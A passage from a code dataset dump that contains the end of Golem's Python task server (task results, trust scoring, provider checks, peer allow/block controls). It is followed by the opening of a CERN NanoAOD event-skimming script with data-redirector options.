cleared\")\r\n self.requested_tasks.clear()\r\n update_requestor_assigned_sum(requestor_id, price)\r\n dispatcher.send(\r\n signal='golem.subtask',\r\n event='started',\r\n subtask_id=subtask_id,\r\n price=price,\r\n )\r\n\r\n def resource_collected(\r\n self,\r\n task_id: str,\r\n subtask_id: Optional[str] = None\r\n ) -> bool:\r\n return self.task_computer.start_computation(task_id, subtask_id)\r\n\r\n def resource_failure(self, task_id: str, reason: str) -> None:\r\n if task_id not in self.task_computer.assigned_task_ids:\r\n logger.error(\"Resource failure for a wrong task, %s\", task_id)\r\n return\r\n\r\n subtask_id = self.task_computer.assigned_subtask_id\r\n self.task_computer.task_interrupted(task_id)\r\n if subtask_id is not None:\r\n self.send_task_failed(\r\n subtask_id, task_id, f'Error downloading resources: {reason}')\r\n else:\r\n logger.error(\"Missing subtask info for task failure %s\", task_id)\r\n\r\n def send_results(\r\n self,\r\n subtask_id: str,\r\n task_id: str,\r\n result: Optional[List[Path]] = None,\r\n task_api_result: Optional[Path] = None,\r\n stats: Optional[Dict] = None,\r\n ) -> None:\r\n if not result and not task_api_result:\r\n raise ValueError('No results to send')\r\n\r\n if subtask_id in self.results_to_send:\r\n raise RuntimeError(\"Incorrect subtask_id: {}\".format(subtask_id))\r\n\r\n # this is purely for tests\r\n if self.config_desc.overwrite_results and result is not None:\r\n for file_path in result:\r\n shutil.copyfile(\r\n src=self.config_desc.overwrite_results,\r\n dst=file_path)\r\n\r\n header = self.task_keeper.task_headers[task_id]\r\n\r\n delay_time = 0.0\r\n last_sending_trial = 0\r\n stats = stats or {}\r\n if result is None:\r\n task_result: Tuple = (str(task_api_result),)\r\n else:\r\n task_result = tuple(result)\r\n\r\n wtr = WaitingTaskResult(\r\n task_id=task_id,\r\n subtask_id=subtask_id,\r\n result=task_result,\r\n last_sending_trial=last_sending_trial,\r\n delay_time=delay_time,\r\n owner=header.task_owner,\r\n stats=stats)\r\n\r\n def enqueue_computed_task_result():\r\n self.results_to_send[wtr.subtask_id] = wtr\r\n Trust.REQUESTED.increase(wtr.owner.key)\r\n\r\n if result:\r\n self._create_and_set_result_package(wtr)\r\n enqueue_computed_task_result()\r\n return\r\n\r\n def on_result_share_success(resource_id):\r\n wtr.package_sha1 = resource_id\r\n wtr.result_path = wtr.result[0]\r\n wtr.result_hash = resource_id\r\n enqueue_computed_task_result()\r\n\r\n def on_result_share_error(err):\r\n logger.error(\r\n \"Cannot share resources for subtask_id=%s: %r\",\r\n subtask_id, err)\r\n\r\n client_options = self.get_share_options(\r\n timeout=deadline_to_timeout(header.deadline))\r\n deferred = self.new_resource_manager.share(\r\n task_api_result,\r\n client_options)\r\n deferred.addCallbacks( # pylint: disable=no-member\r\n on_result_share_success, on_result_share_error)\r\n\r\n def _create_and_set_result_package(self, wtr):\r\n task_result_manager = self.task_manager.task_result_manager\r\n client_options = self.get_share_options(\r\n timeout=self.RESULT_SHARE_TIMEOUT)\r\n\r\n wtr.result_secret = task_result_manager.gen_secret()\r\n result = task_result_manager.create(\r\n wtr,\r\n client_options,\r\n wtr.result_secret)\r\n\r\n (\r\n wtr.result_hash,\r\n wtr.result_path,\r\n wtr.package_sha1,\r\n wtr.result_size,\r\n wtr.package_path,\r\n ) = result\r\n\r\n def send_task_failed(\r\n self,\r\n subtask_id: str,\r\n task_id: str,\r\n err_msg: str,\r\n reason=message.TaskFailure.DEFAULT_REASON,\r\n decrease_trust=True\r\n ) -> None:\r\n header = self.task_keeper.task_headers[task_id]\r\n\r\n if subtask_id not in self.failures_to_send:\r\n if decrease_trust:\r\n Trust.REQUESTED.decrease(header.task_owner.key)\r\n\r\n self.failures_to_send[subtask_id] = WaitingTaskFailure(\r\n task_id=task_id,\r\n subtask_id=subtask_id,\r\n err_msg=err_msg,\r\n owner=header.task_owner,\r\n reason=reason)\r\n\r\n def new_connection(self, session):\r\n if not self.active:\r\n session.disconnect(message.base.Disconnect.REASON.NoMoreMessages)\r\n return\r\n logger.debug(\r\n 'Incoming TaskSession. address=%s:%d',\r\n session.address,\r\n session.port,\r\n )\r\n self.task_sessions_incoming.add(session)\r\n\r\n def disconnect(self):\r\n for node_id in list(self.sessions):\r\n try:\r\n task_session = self.sessions[node_id]\r\n if task_session is None:\r\n # Pending connection\r\n continue\r\n task_session.dropped()\r\n del self.sessions[node_id]\r\n except Exception as exc: # pylint: disable=broad-except\r\n logger.error(\"Error closing session: %s\", exc)\r\n\r\n def get_own_tasks_headers(self):\r\n old_headers = self.task_manager.get_tasks_headers()\r\n new_headers = self._get_and_sign_headers()\r\n return old_headers + new_headers\r\n\r\n def _get_and_sign_headers(self):\r\n started_tasks = self.requested_task_manager.get_started_tasks()\r\n signed_headers = []\r\n for db_task in started_tasks:\r\n # FIXME: store the value in RequestedTask\r\n # https://github.com/golemfactory/golem/pull/\r\n # 4926#discussion_r349627722\r\n subtask_budget = calculate_subtask_payment(\r\n db_task.max_price_per_hour,\r\n db_task.subtask_timeout\r\n )\r\n task_header = dt_tasks.TaskHeader(\r\n min_version=str(gconst.GOLEM_MIN_VERSION),\r\n task_id=db_task.task_id,\r\n environment=db_task.env_id,\r\n environment_prerequisites=db_task.prerequisites,\r\n task_owner=self.node,\r\n deadline=int(db_task.deadline.timestamp()),\r\n subtask_timeout=db_task.subtask_timeout,\r\n subtask_budget=subtask_budget,\r\n subtasks_count=db_task.max_subtasks,\r\n estimated_memory=db_task.min_memory,\r\n max_price=db_task.max_price_per_hour,\r\n concent_enabled=db_task.concent_enabled,\r\n timestamp=int(db_task.start_time.timestamp()),\r\n )\r\n task_header.sign(private_key=self.keys_auth._private_key)\r\n signed_headers.append(task_header)\r\n\r\n return signed_headers\r\n\r\n def get_others_tasks_headers(self) -> List[dt_tasks.TaskHeader]:\r\n return self.task_keeper.get_all_tasks()\r\n\r\n @inlineCallbacks\r\n def add_task_header(self, task_header: dt_tasks.TaskHeader):\r\n if not self._verify_header_sig(task_header):\r\n logger.info(\r\n 'Invalid signature. task_id=%r, signature=%r',\r\n task_header.task_id,\r\n task_header.signature,\r\n )\r\n return False\r\n if task_header.deadline < get_timestamp_utc():\r\n logger.info(\r\n \"Task's deadline already in the past. task_id=%r\",\r\n task_header.task_id\r\n )\r\n return False\r\n\r\n if task_header.environment_prerequisites:\r\n image_name = task_header.environment_prerequisites['image']\r\n self._docker_image_discovered(image_name)\r\n\r\n try:\r\n if self.task_manager.is_my_task(task_header.task_id) or \\\r\n task_header.task_owner.key == self.node.key:\r\n return True # Own tasks are not added to task keeper\r\n\r\n task_added = yield self.task_keeper.add_task_header(task_header)\r\n return task_added\r\n except Exception: # pylint: disable=broad-except\r\n logger.exception(\"Task header validation failed\")\r\n return False\r\n\r\n @classmethod\r\n def _verify_header_sig(cls, header: dt_tasks.TaskHeader):\r\n try:\r\n header.verify(public_key=decode_hex(header.task_owner.key))\r\n except msg_exceptions.CryptoError:\r\n logger.debug(\r\n 'hdr verification failed. hdr.task_owner.key: %r',\r\n header.task_owner.key,\r\n exc_info=True,\r\n )\r\n return False\r\n return True\r\n\r\n @rpc_utils.expose('comp.tasks.known.delete')\r\n def remove_task_header(self, task_id) -> bool:\r\n logger.debug(\"removing task header: task_id=%s\", task_id)\r\n self.requested_tasks.discard(task_id)\r\n return self.task_keeper.remove_task_header(task_id)\r\n\r\n def set_last_message(self, type_, t, msg, ip_addr, port):\r\n if len(self.last_messages) >= 5:\r\n self.last_messages = self.last_messages[-4:]\r\n\r\n self.last_messages.append([type_, t, ip_addr, port, msg])\r\n\r\n def _task_result_sent(self, subtask_id):\r\n return self.results_to_send.pop(subtask_id, None)\r\n\r\n @inlineCallbacks\r\n def change_config(\r\n self,\r\n config_desc: ClientConfigDescriptor,\r\n run_benchmarks: bool = False\r\n ) -> Deferred: # pylint: disable=arguments-differ\r\n\r\n PendingConnectionsServer.change_config(self, config_desc)\r\n yield self.task_keeper.change_config(config_desc)\r\n yield self._change_task_computer_config(config_desc, run_benchmarks)\r\n\r\n @inlineCallbacks\r\n def _change_task_computer_config(\r\n self,\r\n config_desc: ClientConfigDescriptor,\r\n run_benchmarks: bool,\r\n ) -> Deferred:\r\n config_changed = yield self.task_computer.change_config(config_desc)\r\n if config_changed:\r\n self._remove_env_performance_scores()\r\n self.app_benchmark_manager.remove_benchmark_scores()\r\n elif not run_benchmarks:\r\n return\r\n\r\n self.task_computer.lock_config(True)\r\n deferred = Deferred()\r\n self.benchmark_manager.run_all_benchmarks(\r\n deferred.callback, deferred.errback)\r\n yield deferred\r\n self.task_computer.lock_config(False)\r\n\r\n def _remove_env_performance_scores(self) -> None:\r\n env_manager = self.task_keeper.new_env_manager\r\n for env_id in env_manager.environments():\r\n env_manager.remove_cached_performance(env_id)\r\n\r\n def get_task_computer_root(self):\r\n return os.path.join(self.client.datadir, \"ComputerRes\")\r\n\r\n def get_app_dir(self) -> Path:\r\n \"\"\" Get path to the directory where definitions for Task API apps are\r\n stored. \"\"\"\r\n return Path(self.client.datadir) / \"apps\"\r\n\r\n def subtask_rejected(self, sender_node_id, subtask_id):\r\n \"\"\"My (providers) results were rejected\"\"\"\r\n logger.debug(\"Subtask %r result rejected\", subtask_id)\r\n self._task_result_sent(subtask_id)\r\n\r\n self._decrease_trust_payment(sender_node_id)\r\n # self.remove_task_header(task_id)\r\n # TODO Inform transaction system and task manager about rejected\r\n # subtask. Issue #2405\r\n\r\n # pylint:disable=too-many-arguments\r\n def subtask_accepted(\r\n self,\r\n sender_node_id: str,\r\n task_id: str,\r\n subtask_id: str,\r\n payer_address: str,\r\n value: int,\r\n accepted_ts: int):\r\n \"\"\"My (providers) results were accepted\"\"\"\r\n logger.debug(\"Subtask %r result accepted\", subtask_id)\r\n self._task_result_sent(subtask_id)\r\n self.client.transaction_system.expect_income(\r\n sender_node=sender_node_id,\r\n task_id=task_id,\r\n subtask_id=subtask_id,\r\n payer_address=payer_address,\r\n value=value,\r\n accepted_ts=accepted_ts,\r\n )\r\n\r\n def subtask_settled(self, sender_node_id, subtask_id, settled_ts):\r\n \"\"\"My (provider's) results were accepted by the Concent\"\"\"\r\n logger.debug(\"Subtask %r settled by the Concent\", subtask_id)\r\n self._task_result_sent(subtask_id)\r\n self.client.transaction_system.settle_income(\r\n sender_node_id, subtask_id, settled_ts)\r\n\r\n def subtask_waiting(self, task_id, subtask_id=None):\r\n logger.debug(\r\n \"Requestor waits for subtask results.\"\r\n \" task_id=%(task_id)s subtask_id=%(subtask_id)s\",\r\n {\r\n 'task_id': task_id,\r\n 'subtask_id': subtask_id,\r\n },\r\n )\r\n # We can still try to request a subtask for this task next time.\r\n self.requested_tasks.discard(task_id)\r\n\r\n def subtask_failure(self, subtask_id, err):\r\n logger.info(\"Computation for task %r failed: %r.\", subtask_id, err)\r\n node_id = self.task_manager.get_node_id_for_subtask(subtask_id)\r\n Trust.COMPUTED.decrease(node_id)\r\n self.task_manager.task_computation_failure(subtask_id, err)\r\n\r\n def accept_result(self, task_id, subtask_id, key_id, eth_address: str,\r\n value: int, *, unlock_funds=True) -> TaskPayment:\r\n # FIXME: trust\r\n if self.requested_task_manager.task_exists(task_id):\r\n trust = 1.0\r\n else:\r\n trust = self.task_manager.get_trust_mod(subtask_id)\r\n mod = min(max(trust, self.min_trust), self.max_trust)\r\n Trust.COMPUTED.increase(key_id, mod)\r\n payment = self.client.transaction_system.add_payment_info(\r\n node_id=key_id,\r\n task_id=task_id,\r\n subtask_id=subtask_id,\r\n value=value,\r\n eth_address=eth_address,\r\n )\r\n # task lock is removed before subtask, suppress warning in this case\r\n if unlock_funds and self.client.funds_locker.has_task(task_id):\r\n self.client.funds_locker.remove_subtask(task_id)\r\n logger.debug('Result accepted for subtask: %s Created payment ts: %r',\r\n subtask_id, payment)\r\n return payment\r\n\r\n def income_listener(self, event='default', node_id=None, **kwargs):\r\n if event == 'confirmed':\r\n self._increase_trust_payment(node_id, kwargs['amount'])\r\n elif event == 'overdue_single':\r\n self._decrease_trust_payment(node_id)\r\n\r\n def finished_subtask_listener(self, # pylint: disable=too-many-arguments\r\n event='default', subtask_id=None,\r\n min_performance=None, **_kwargs):\r\n\r\n if event != 'subtask_finished':\r\n return\r\n\r\n keeper = self.task_manager.comp_task_keeper\r\n\r\n try:\r\n task_id = keeper.get_task_id_for_subtask(subtask_id)\r\n header = keeper.get_task_header(task_id)\r\n performance = keeper.active_tasks[task_id].performance\r\n computation_time = timer.ProviderTimer.time\r\n node_id = keeper.get_node_for_task_id(task_id)\r\n\r\n if computation_time:\r\n logger.debug(\r\n \"updating requestor efficiency. \"\r\n \"node_id=%s, timeout=%s, computation_timer=%s, \"\r\n \"performance=%s, min_performance=%s\",\r\n node_id, header.subtask_timeout, computation_time,\r\n performance, min_performance\r\n )\r\n\r\n update_requestor_efficiency(\r\n node_id=node_id,\r\n timeout=header.subtask_timeout,\r\n computation_time=computation_time,\r\n performance=performance,\r\n min_performance=min_performance,\r\n )\r\n else:\r\n logger.debug(\r\n \"still computing, will update requestor efficiency later\"\r\n )\r\n\r\n except (KeyError, ValueError, AttributeError) as exc:\r\n logger.error(\"Finished subtask listener: %r\", exc)\r\n return\r\n\r\n def finished_task_listener(self, event='default', task_id=None, op=None,\r\n **_kwargs):\r\n if not (event == 'task_status_updated'\r\n and self.client.p2pservice):\r\n return\r\n if not (op in [TaskOp.FINISHED, TaskOp.TIMEOUT, TaskOp.ABORTED]):\r\n return\r\n self.client.p2pservice.remove_task(task_id)\r\n self.client.funds_locker.remove_task(task_id)\r\n if not self.requested_task_manager.has_unfinished_tasks():\r\n self.client.update_setting('accept_tasks', True, False)\r\n\r\n def _increase_trust_payment(self, node_id: str, amount: int):\r\n Trust.PAYMENT.increase(node_id, self.max_trust)\r\n update_requestor_paid_sum(node_id, amount)\r\n\r\n def _decrease_trust_payment(self, node_id: str):\r\n Trust.PAYMENT.decrease(node_id, self.max_trust)\r\n\r\n def reject_result(self, subtask_id, key_id):\r\n mod = min(\r\n max(self.task_manager.get_trust_mod(subtask_id), self.min_trust),\r\n self.max_trust)\r\n Trust.WRONG_COMPUTED.decrease(key_id, mod)\r\n\r\n def get_socket_addresses(self, node_info, prv_port=None, pub_port=None):\r\n \"\"\" Change node info into tcp addresses. Adds a suggested address.\r\n :param Node node_info: node information\r\n :param prv_port: private port that should be used\r\n :param pub_port: public port that should be used\r\n :return:\r\n \"\"\"\r\n prv_port = prv_port or node_info.prv_port\r\n pub_port = pub_port or node_info.pub_port\r\n\r\n socket_addresses = super().get_socket_addresses(\r\n node_info=node_info,\r\n prv_port=prv_port,\r\n pub_port=pub_port\r\n )\r\n\r\n address = self.client.get_suggested_addr(node_info.key)\r\n if not address:\r\n return socket_addresses\r\n\r\n if self._is_address_valid(address, prv_port):\r\n socket_address = SocketAddress(address, prv_port)\r\n self._prepend_address(socket_addresses, socket_address)\r\n\r\n if self._is_address_valid(address, pub_port):\r\n socket_address = SocketAddress(address, pub_port)\r\n self._prepend_address(socket_addresses, socket_address)\r\n\r\n return socket_addresses[:MAX_CONNECT_SOCKET_ADDRESSES]\r\n\r\n def add_forwarded_session_request(self, key_id, conn_id):\r\n self.forwarded_session_requests[key_id] = dict(\r\n conn_id=conn_id, time=time.time())\r\n\r\n def get_min_performance_for_env(self, env_id: str) -> float:\r\n env = self.get_environment_by_id(env_id)\r\n if isinstance(env, OldEnv):\r\n return env.get_min_accepted_performance()\r\n # NewEnv\r\n # TODO: Implement minimum performance in new env\r\n return 0.0\r\n\r\n class RejectedReason(Enum):\r\n not_my_task = 'not my task'\r\n performance = 'performance'\r\n disk_size = 'disk size'\r\n memory_size = 'memory size'\r\n acl = 'acl'\r\n trust = 'trust'\r\n netmask = 'netmask'\r\n not_accepted = 'not accepted'\r\n\r\n def should_accept_provider( # pylint: disable=too-many-return-statements\r\n self, node_id: str, ip_addr: str, task_id: str,\r\n provider_perf: float, max_memory_size: int,\r\n offer_hash: str) -> bool:\r\n\r\n # max_memory_size: int KiB\r\n max_memory_size_b = int(max_memory_size) * 1024 # Bytes\r\n\r\n node_name_id = short_node_id(node_id)\r\n ids = f'provider={node_name_id}, task_id={task_id}'\r\n\r\n if task_id in self.task_manager.tasks:\r\n task = self.task_manager.tasks[task_id]\r\n env_id = task.header.environment\r\n min_memory = task.header.estimated_memory\r\n mask = task.header.mask\r\n accept_client_verdict = task.should_accept_client(\r\n node_id,\r\n offer_hash)\r\n logger.debug(\r\n \"should_accept_client verdict: %s, task_id=%s\",\r\n accept_client_verdict,\r\n task_id,\r\n )\r\n elif self.requested_task_manager.task_exists(task_id):\r\n req_task = self.requested_task_manager.get_requested_task(task_id)\r\n assert req_task, \"Task missing due a race condition\"\r\n env_id = req_task.env_id\r\n min_memory = req_task.min_memory\r\n mask = Mask(req_task.mask)\r\n # For compatibility purposes; the app decides to whom assign a task\r\n accept_client_verdict = AcceptClientVerdict.ACCEPTED\r\n else:\r\n logger.info('Cannot find task in my tasks: %s', ids)\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.not_my_task)\r\n return False\r\n\r\n min_accepted_perf = self.get_min_performance_for_env(env_id)\r\n\r\n if min_accepted_perf > int(provider_perf):\r\n logger.info(f'insufficient provider performance: {provider_perf}'\r\n f' < {min_accepted_perf}; {ids}')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.performance,\r\n details={\r\n 'provider_perf': provider_perf,\r\n 'min_accepted_perf': min_accepted_perf,\r\n })\r\n return False\r\n\r\n if min_memory > max_memory_size_b:\r\n logger.info(\r\n 'insufficient provider memory size:'\r\n ' %(available)s < %(min_memory)s;'\r\n ' Free at least %(missing)s; %(ids)s',\r\n {\r\n 'min_memory': memoryhelper.dir_size_to_display(min_memory),\r\n 'available': memoryhelper.dir_size_to_display(\r\n max_memory_size_b,\r\n ),\r\n 'missing': memoryhelper.dir_size_to_display(\r\n min_memory - max_memory_size_b,\r\n ),\r\n 'ids': ids,\r\n }\r\n )\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.memory_size,\r\n details={\r\n 'memory_size': min_memory,\r\n 'max_memory_size': max_memory_size * 1024,\r\n })\r\n return False\r\n\r\n allowed, reason = self.acl.is_allowed(node_id)\r\n if allowed:\r\n allowed, reason = self.acl_ip.is_allowed(ip_addr)\r\n if not allowed:\r\n reason_msg = 'unknown reason' if reason is None else reason.value\r\n logger.info(f'provider is {reason_msg}; {ids}')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.acl,\r\n details={'acl_reason': reason_msg})\r\n return False\r\n\r\n trust = self.client.get_computing_trust(node_id)\r\n if trust < self.config_desc.computing_trust:\r\n logger.info(f'insufficient provider trust level: {trust} < '\r\n f'{self.config_desc.computing_trust}; {ids}')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.trust,\r\n details={\r\n 'trust': trust,\r\n 'required_trust': self.config_desc.computing_trust,\r\n })\r\n return False\r\n\r\n if not mask.matches(decode_hex(node_id)):\r\n logger.info(f'network mask mismatch: {ids}')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.netmask)\r\n return False\r\n\r\n if accept_client_verdict != AcceptClientVerdict.ACCEPTED:\r\n logger.info(f'provider {node_id} is not allowed'\r\n f' for this task at this moment '\r\n f'(either waiting for results or previously failed)')\r\n self.notify_provider_rejected(\r\n node_id=node_id, task_id=task_id,\r\n reason=self.RejectedReason.not_accepted,\r\n details={\r\n 'verdict': accept_client_verdict.value,\r\n })\r\n return False\r\n\r\n logger.debug('provider can be accepted %s', ids)\r\n return True\r\n\r\n @classmethod\r\n def notify_provider_rejected(cls, node_id: str, task_id: str,\r\n reason: RejectedReason,\r\n details: Optional[Dict[str, Any]] = None):\r\n dispatcher.send(\r\n signal='golem.taskserver',\r\n event='provider_rejected',\r\n node_id=node_id,\r\n task_id=task_id,\r\n reason=reason.value,\r\n details=details,\r\n )\r\n\r\n def should_accept_requestor(self, node_id):\r\n allowed, reason = self.acl.is_allowed(node_id)\r\n if not allowed:\r\n short_id = short_node_id(node_id)\r\n logger.info('requestor is %s. node=%s', reason, short_id)\r\n return SupportStatus.err({UnsupportReason.DENY_LIST: node_id})\r\n trust = self.client.get_requesting_trust(node_id)\r\n logger.debug(\"Requesting trust level: %r\", trust)\r\n if trust >= self.config_desc.requesting_trust:\r\n return SupportStatus.ok()\r\n return SupportStatus.err({UnsupportReason.REQUESTOR_TRUST: trust})\r\n\r\n @rpc_utils.expose('net.peer.block')\r\n def disallow_node(\r\n self,\r\n node_id: Union[str, list],\r\n timeout_seconds: int = -1,\r\n ) -> Tuple[bool, List[str], Optional[str]]:\r\n '''\r\n return Tuple\r\n (is_disallow_success, list_of_already_disallowed_nodes, err_message)\r\n\r\n Success: (True, [], None)\r\n Success with existing node: (True, ['node_id'], None)\r\n Error: (False, [], 'message')\r\n '''\r\n not_changed: List[str] = []\r\n try:\r\n if isinstance(node_id, str):\r\n node_id = [node_id]\r\n for item in node_id:\r\n if not self.acl.disallow(item, timeout_seconds):\r\n not_changed.append(item)\r\n return True, not_changed, None\r\n except Exception as e: # pylint: disable=broad-except\r\n return False, not_changed, str(e)\r\n\r\n @rpc_utils.expose('net.peer.block_ip')\r\n def disallow_ip(self, ip: Union[str, list],\r\n timeout_seconds: int = -1) -> None:\r\n if isinstance(ip, str):\r\n ip = [ip]\r\n for item in ip:\r\n self.acl_ip.disallow(item, timeout_seconds)\r\n\r\n @rpc_utils.expose('net.peer.allow')\r\n def allow_node(\r\n self,\r\n node_id: Union[str, list],\r\n persist: bool = True\r\n ) -> Tuple[bool, List[str], Optional[str]]:\r\n '''\r\n return Tuple\r\n (is_allow_success, list_of_already_allowed_nodes, err_message)\r\n\r\n Success: (True, [], None)\r\n Success with existing node: (True, ['node_id'], None)\r\n Error: (False, [], 'message')\r\n '''\r\n not_changed: List[str] = []\r\n try:\r\n if isinstance(node_id, str):\r\n node_id = [node_id]\r\n for item in node_id:\r\n if not self.acl.allow(item, persist):\r\n not_changed.append(item)\r\n return True, not_changed, None\r\n except Exception as e: # pylint: disable=broad-except\r\n return False, not_changed, str(e)\r\n\r\n @rpc_utils.expose('net.peer.allow_ip')\r\n def allow_ip(self, ip: Union[str, list], persist: bool = True) -> None:\r\n if isinstance(ip, str):\r\n ip = [ip]\r\n for item in ip:\r\n self.acl_ip.allow(item, persist)\r\n\r\n @rpc_utils.expose('net.peer.acl')\r\n def acl_status(self) -> Dict:\r\n return self.acl.status().to_message()\r\n\r\n @rpc_utils.expose('net.peer.acl_ip')\r\n def acl_ip_status(self) -> Dict:\r\n return self.acl_ip.status().to_message()\r\n\r\n @rpc_utils.expose('net.peer.acl.new')\r\n def acl_setup(self, default_rule: str, exceptions: List[str]) -> None:\r\n new_acl = setup_acl(self.client,\r\n AclRule[default_rule],\r\n exceptions)\r\n self.acl = new_acl\r\n\r\n def _sync_forwarded_session_requests(self):\r\n now = time.time()\r\n for key_id, data in list(self.forwarded_session_requests.items()):\r\n if not data:\r\n del self.forwarded_session_requests[key_id]\r\n continue\r\n if now - data['time'] >= self.forwarded_session_request_timeout:\r\n logger.debug('connection timeout: %s', data)\r\n del self.forwarded_session_requests[key_id]\r\n self.final_conn_failure(data['conn_id'])\r\n\r\n def _listening_established(self, port: int) -> None:\r\n logger.debug('_listening_established(%r)', port)\r\n self.cur_port = port\r\n logger.info(\" Port {} opened - listening\".format(self.cur_port))\r\n self.node.prv_port = self.cur_port\r\n self.task_manager.node = self.node\r\n\r\n def _listening_failure(self, **kwargs):\r\n logger.error(\"Listening on ports {} to {} failure\".format(\r\n self.config_desc.start_port, self.config_desc.end_port))\r\n # FIXME: some graceful terminations should take place here. #1287\r\n # sys.exit(0)\r\n\r\n #############################\r\n # SYNC METHODS\r\n #############################\r\n def __remove_old_tasks(self):\r\n self.task_keeper.remove_old_tasks()\r\n self.task_manager.comp_task_keeper.remove_old_tasks()\r\n nodes_with_timeouts = self.task_manager.check_timeouts()\r\n for node_id in nodes_with_timeouts:\r\n Trust.COMPUTED.decrease(node_id)\r\n\r\n def _send_waiting_results(self):\r\n for subtask_id in list(self.results_to_send.keys()):\r\n wtr: WaitingTaskResult = self.results_to_send[subtask_id]\r\n now = time.time()\r\n\r\n if not wtr.already_sending:\r\n if now - wtr.last_sending_trial > wtr.delay_time:\r\n wtr.already_sending = True\r\n wtr.last_sending_trial = now\r\n helpers.send_report_computed_task(\r\n task_server=self,\r\n waiting_task_result=wtr,\r\n )\r\n\r\n for wtf in list(self.failures_to_send.values()):\r\n helpers.send_task_failure(\r\n waiting_task_failure=wtf,\r\n )\r\n self.failures_to_send.clear()\r\n\r\n # CONFIGURATION METHODS\r\n #############################\r\n @staticmethod\r\n def __get_task_manager_root(datadir):\r\n return os.path.join(datadir, \"ComputerRes\")\r\n\r\n\r\n@dataclass\r\nclass WaitingTaskResult:\r\n delay_time: float\r\n last_sending_trial: int\r\n owner: 'dt_p2p.Node'\r\n result: Tuple\r\n subtask_id: str\r\n task_id: str\r\n\r\n already_sending: bool = False\r\n package_path: Optional[str] = None\r\n package_sha1: Optional[str] = None\r\n result_hash: Optional[str] = None\r\n result_path: Optional[str] = None\r\n result_secret: Optional[str] = None\r\n result_sha1: Optional[str] = None\r\n result_size: int = 0\r\n stats: Dict = field(default_factory=dict)\r\n\r\n\r\n@dataclass\r\nclass WaitingTaskFailure:\r\n err_msg: str\r\n owner: 'dt_p2p.Node'\r\n subtask_id: str\r\n task_id: str\r\n reason: message.TaskFailure.REASON\r\n","repo_name":"golemfactory/clay","sub_path":"golem/task/taskserver.py","file_name":"taskserver.py","file_ext":"py","file_size_in_byte":55435,"program_lang":"python","lang":"en","doc_type":"code","stars":2915,"dataset":"github-code","pt":"7"} +{"seq_id":"6190485317","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 1 Jan 2019\n\n@author: NikHoffStyl\n\"\"\"\n\nfrom __future__ import (division, print_function)\n\nimport time\nimport os\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.postprocessor import PostProcessor\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\n\n\n\"\"\" Process command-line arguments \nThis takes command line arguments and saves them to one variable which can be later \ngiven as input to another function.\nUse --help to print details of the arguments provided.\n\n\"\"\"\nparser = ArgumentParser(description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter)\nparser.add_argument('--verbose', help='Print more data',action='store_true')\nparser.add_argument(\"--fileName\", help=\"String/Name of a file of a dataset\")\nparser.add_argument(\"--redirector\", choices=[\"xrd-global\", \"xrdUS\", \"xrdEU_Asia\", \"eos\", \"iihe\"],\n default=\"xrd-global\", help=\"Sets redirector to query locations for LFN\")\nparser.add_argument(\"--eventLimit\", type=int, default=-1,\n help=\"Set a limit to the number of events, feature is recommended when running tests.\")\nargs = parser.parse_args()\n\nclass Dataset():\n \"\"\"\n This class used to list key aspects of the dataset production\n \"\"\"\n def __init__(self, pathToFile):\n \"\"\"\n Initialise global class variables\n\n Args:\n pathToFile (string): dataset\n \"\"\"\n foldersList = pathToFile.split(\"/\")\n numberOfSteps = pathToFile.count(\"/\")\n self.storagePWD = \"/\".join(foldersList[:numberOfSteps]) + \"/\"\n self.fileName, fExt = foldersList[-1].split(\".\")\n self.type = foldersList[2]\n self.runVersion = foldersList[3]\n\n if '16' in self.runVersion: self.year = '16'\n elif '17' in self.runVersion: self.year = '17'\n elif '18' in self.runVersion: self.year = '18'\n else: self.year = ''\n\n if self.type == \"mc\": self.primaryName = foldersList[4]\n elif self.type == \"data\": self.primaryName = foldersList[4] + \"_\" + foldersList[3] + \"_\" + foldersList[6]\n else: self.channelType = \"UnknownType\"\n \n\nclass PfJetsSkimmer(Module):\n \"\"\"This class is to be used by the postprocessor to skimm a file down\n using the requirement of number of jets and a single lepton.\"\"\"\n\n def __init__(self, writeHistFile=True, eventLimit=-1):\n \"\"\" Initialise global variables\n Args:\n writeHistFile (bool): True to write file, False otherwise\n \"\"\"\n\n self.eventCounter = 0\n self.writeHistFile = writeHistFile\n self.eventLimit = eventLimit\n\n def beginJob(self, histFile=None, histDirName=None):\n \"\"\"begin job\"\"\"\n Module.beginJob(self, histFile, histDirName)\n\n def endJob(self):\n \"\"\"end Job\"\"\"\n Module.endJob(self)\n\n def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n \"\"\"add branches to file\"\"\"\n self.out = wrappedOutputTree\n pass\n\n def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n \"\"\"end file\"\"\"\n pass\n\n def analyze(self, event):\n \"\"\"process event, return True (go to next module) or False (fail, go to next event)\"\"\"\n self.eventCounter += 1\n\n if self.eventCounter > self.eventLimit > -1:\n return False\n return True\n\ndef chooseRedirector(arg):\n \"\"\"\n Sets redirector using keyword given in commandline arguments\n Args:\n arg: command line argument list\n\n Returns:\n redir: redirector, where redirector + LFN = PFN\n\n \"\"\"\n if arg.redirector == \"xrd-global\":\n redir = \"root://cms-xrd-global.cern.ch/\"\n elif arg.redirector == \"xrdUS\":\n redir = \"root://cmsxrootd.fnal.gov/\"\n elif arg.redirector == \"xrdEU_Asia\":\n redir = \"root://xrootd-cms.infn.it/\"\n elif arg.redirector == \"eos\":\n redir = \"root://cmseos.fnal.gov/\"\n elif arg.redirector == \"iihe\":\n redir = \"dcap://maite.iihe.ac.be/pnfs/iihe/cms/ph/sc4/\"\n else:\n return \"\"\n return redir\n\n\ndef skimmer(arg):\n \"\"\"\n\n 